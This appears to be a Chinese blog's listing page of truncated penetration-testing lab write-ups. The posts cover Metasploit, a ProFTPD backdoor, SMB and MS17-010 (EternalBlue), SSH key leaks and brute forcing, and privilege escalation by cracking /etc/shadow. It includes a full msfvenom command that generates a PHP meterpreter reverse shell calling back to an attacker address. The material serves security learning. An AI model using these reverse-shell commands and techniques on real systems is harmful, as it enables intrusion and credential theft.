web渗透
关注
分享
扫一扫
Captain Hammer
考研ing
展开
-
metasploit framework
1,制作一个反弹shell,来执行服务的命令,并监听(能在浏览器上直接访问的就制作php的,可以使用命令执行的建议使用 python型的)(制作python型的只需要把php改为python就可以了)msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.11.166 lport=4444 -f raw-p 指定使用模块 -f...原创 2019-10-30 17:12:32 · 716 阅读 · 0 评论 -
FTP服务后门利用
靶场: ubuntu 192.168.142.128攻击机: kali 192.168.11.165信息收集:探测服务信息:nmap -sV 192.168.142.128可以看到靶机开启了 21 ftp服务,版本号为ProFTPD 1.3.3c使用 searchsploit 查看漏洞信息,找到可以利用的溢出代码可以看到有两个可以用的漏洞,第一个是 远...原创 2019-10-30 17:12:42 · 1551 阅读 · 0 评论 -
SMB漏洞
目录一,SMB信息泄露充电站:二,MS17-010 (永恒之蓝) 复现一,SMB信息泄露靶场:192.168.11.167攻击机:kali 192.168.11.165信息探测:nmap -sV 192.168.11.167可以看到开放了,22 ssh端口,139,445的smb服务端口,以及3306的mysal服务扫描更详细的信息:nmap -...原创 2019-10-06 22:10:55 · 10742 阅读 · 0 评论 -
SSH远程登录解析(linux)
目录一,什么是ssh?二,SSH的两种登录方式剖析:1,口令登录:过程:实际操作过程:特别注意:2,秘钥登录:过程:实际操作过程:三,known_host、authorized_keys、config文件1,known_host:2,authorized_keys:3,config:一,什么是ssh?简单说,SSH是一种网络协议,用于计算...原创 2019-10-05 15:35:34 · 485 阅读 · 0 评论 -
SSH服务的渗透测试
目录一,ssh私钥泄露充电站:二,ssh 服务测试(暴力破解)充电站:一,ssh私钥泄露靶场:192.168.11.1661,信息嗅探对于一个给定的ip得知的靶场机器,我们需要用对其进行扫描,探测开放的服务。(渗透其实是针对服务的漏洞进行探测,然后对应的数据包发送,获取机器的最高权限)nmap -sV 192.168.11.166 //挖掘开放服务...原创 2019-10-05 14:14:17 · 3466 阅读 · 0 评论 -
靶场提权记录
目录1,下载 靶场的 /etc/passwd 文件 和 /etc/shadow 文件 并破解2, 利用 C语言程序溢出漏洞进行提权(前提是 程序中具有 代码执行函数 execve())3,在本地登录 ssh 实现提权4,使用 perl命令提权5,利用 ubuntu 4.4.0内核 溢出 提权1,下载 靶场的 /etc/passwd 文件 和 /etc/shadow...原创 2019-10-30 17:12:16 · 781 阅读 · 0 评论